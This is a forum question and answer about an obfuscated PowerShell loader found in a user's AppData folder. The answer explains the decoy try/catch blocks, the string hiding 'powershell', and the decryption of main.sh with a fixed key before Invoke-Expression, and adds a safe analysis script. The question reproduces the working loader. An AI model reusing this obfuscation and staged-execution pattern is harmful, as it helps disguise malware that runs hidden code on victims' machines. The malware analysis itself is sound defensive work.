
Windows PowerShell Malicious script


I found this code in a folder in %appdata%\Roaming :( Can anybody tell me what it does?

try{Get-Transaction:Test-Connection
New-WindowsImage:Register-ArgumentCompleter
Get-HgsTrace:Set-VMMigrationNetwork}catch{

$sexq="pZsvjJoFqppwjeLWZTreMIrzqZarktnOJMwsddyKhIBlweDpKblExIlrlfWkOVsb" -replace "IoG|ZsvjJ|Fqpp|jeLWZTr|MIrzqZa|ktnOJMw|ddyK|IBlw|DpKb|ExIlr|fWkOVsb";
try{Save-VM:Get-Variable
Set-RuleOption:Get-WindowsSearchSetting
Remove-PSReadLineKeyHandler:Remove-VMResourcePool}catch{}
$ILRorUyZk=Get-Process $sexq;
if ($ILRorUyZk.length -lt 2){
$uMBOKUgyzWiOSfp=@(1..16);
$HXZBX=[System.Runtime.InteropServices.Marshal]
$iuOpORc= Get-Content "main.sh"
$kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;
$reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);
try{Remove-ItemProperty:Show-WindowsDeveloperLicenseRegistration
Connect-WSMan:Confirm-SecureBootUEFI
Revoke-VMConnectAccess:Suspend-VMReplication}catch{$upd='LmzXprwH';}
$zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
try{Move-Item:Find-Package
Update-FormatData:Invoke-Item
ForEach-Object:New-TlsSessionTicketKey}catch{}
$zcthAxqVWAZrzkx -replace "UGSttylIkwIFr" | iex;}}

Thank you!


Solution

  • Let's see. The first try-catch might be obfuscation to hide from cursory examination. The catch (pun intended) is in the catch block. It contains the payload, so the try block is intended to throw an exception.

    $sexq="pZsvjJoFqppwjeLWZTreMIrzqZarktnOJMwsddyKhIBlweDpKblExIlrlfWkOVsb" `
      -replace "IoG|ZsvjJ|Fqpp|jeLWZTr|MIrzqZa|ktnOJMw|ddyK|IBlw|DpKb|ExIlr|fWkOVsb";
    

    The variable contains the obfuscated word powershell, which is revealed by replacing a lot of nonsense strings with nothing. There is a -replace with a search argument but no replacement argument, thus it just removes the fillers IoG, ZsvjJ...

    $ILRorUyZk=Get-Process $sexq;
    if ($ILRorUyZk.length -lt 2){
    $uMBOKUgyzWiOSfp=@(1..16);
    

    Here Get-Process is used to find if Powershell is running. If multiple processes aren't being run, create an array containing values 1-16. This might be to avoid situations in which interactive sessions are active.

    $HXZBX=[System.Runtime.InteropServices.Marshal]
    

    Create an alias to InteropServices' Marshal. Nothing troublesome here; the legitimate use is to save typing and reading long namespace descriptors.

    $iuOpORc= Get-Content "main.sh"
    $kvsqQjipalHpywxaPr= ConvertTo-SecureString $iuOpORc -key $uMBOKUgyzWiOSfp;
    

    A file main.sh is read. It contains a SecureString, encrypted with key 1,2,3...,15,16.

    $reEFPHvZmrf = $HXZBX::SecureStringToBSTR($kvsqQjipalHpywxaPr);
    

    SecureString payload is converted to BSTR. This is to decrypt the SecureString, I guess.

    try{Remove-ItemProperty:Show-WindowsDeveloperLicenseRegistration
    Connect-WSMan:Confirm-SecureBootUEFI
    Revoke-VMConnectAccess:Suspend-VMReplication}catch{$upd='LmzXprwH';}
    

    Another "let's hide in the catch block" that sets a variable with nonsense content. No idea why.

    $zcthAxqVWAZrzkx = $HXZBX::PtrToStringAuto($reEFPHvZmrf);
    try{Move-Item:Find-Package
    Update-FormatData:Invoke-Item
    ForEach-Object:New-TlsSessionTicketKey}catch{}
    

    Another step in decryption, followed by weird stuff in another try-catch block without obvious intent.

    $zcthAxqVWAZrzkx -replace "UGSttylIkwIFr" | iex;}}
    

    The final payload from SecureString conversion is filtered to remove obfuscation, and the result is passed for execution to Invoke-Expression.

    To see what the payload is, do as per Jeramy's comment. Replacing the variable names with a bit more descriptive ones:

    $HXZBX = [System.Runtime.InteropServices.Marshal]   # same alias the script creates
    $key=@(1..16)
    $encryptedStr = Get-Content "main.sh"
    $secString = ConvertTo-SecureString $encryptedStr -key $key
    $bstrPtr = $HXZBX::SecureStringToBSTR($secString)
    $obfuscatedStr = $HXZBX::PtrToStringAuto($bstrPtr)
    $obfuscatedStr -replace "UGSttylIkwIFr"
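The decryption chain above as an added, self-contained analysis script (not code from the question or the answer). It constructs its own sample file in place of main.sh, runs the same ConvertTo-SecureString / SecureStringToBSTR / PtrToStringAuto sequence on it, and writes the result to a file instead of piping it to Invoke-Expression. The file names and the ConvertFrom-KeyedSecureString helper are assumptions made for the illustration; the key 1..16 and the filler token are taken from the script in the question.

```powershell
# Added analysis helper, not part of the original post.
# Reproduces the script's decryption chain on constructed sample data and
# never executes what it recovers.

$Marshal = [System.Runtime.InteropServices.Marshal]
$key     = [byte[]](1..16)    # the script's hardcoded 16-byte (AES-128) key

# --- Constructed stand-in for main.sh ---------------------------------------
# When ConvertFrom-SecureString is given -Key, the output is AES-encrypted with
# that key alone (no DPAPI, no user or machine binding), so any host holding the
# key can decrypt it. That is why the script can carry a fixed key and still
# run on an arbitrary machine. The sample text is harmless.
$samplePayload = 'Write-Host "hello from the decoded sample"'
$sampleSecure  = ConvertTo-SecureString $samplePayload -AsPlainText -Force
$encryptedText = ConvertFrom-SecureString $sampleSecure -Key $key
Set-Content -Path ".\sample_main.sh" -Value $encryptedText

# --- The decryption chain, exactly as the script performs it ----------------
function ConvertFrom-KeyedSecureString {
    param([string]$EncryptedText, [byte[]]$Key)
    $secure = ConvertTo-SecureString $EncryptedText -Key $Key
    $bstr   = $Marshal::SecureStringToBSTR($secure)
    try {
        return $Marshal::PtrToStringAuto($bstr)
    } finally {
        $Marshal::ZeroFreeBSTR($bstr)   # release the unmanaged plaintext copy
    }
}

$obfuscated = ConvertFrom-KeyedSecureString `
    -EncryptedText (Get-Content ".\sample_main.sh") -Key $key

# The script strips this filler token before execution; on the constructed
# sample the replacement is simply a no-op.
$decoded = $obfuscated -replace "UGSttylIkwIFr"

# Write the recovered text out for reading; do not pipe it to iex.
Set-Content -Path ".\decoded_payload.txt" -Value $decoded
Write-Host "Recovered text written to decoded_payload.txt:"
Write-Host $decoded
```

On a real sample, drop the constructed block and point Get-Content at the actual main.sh; the rest of the chain is unchanged. Keeping the output in a file rather than on the pipeline to Invoke-Expression is the whole point of the exercise: it lets you read the second stage (and any further stages it decodes in turn) without running it.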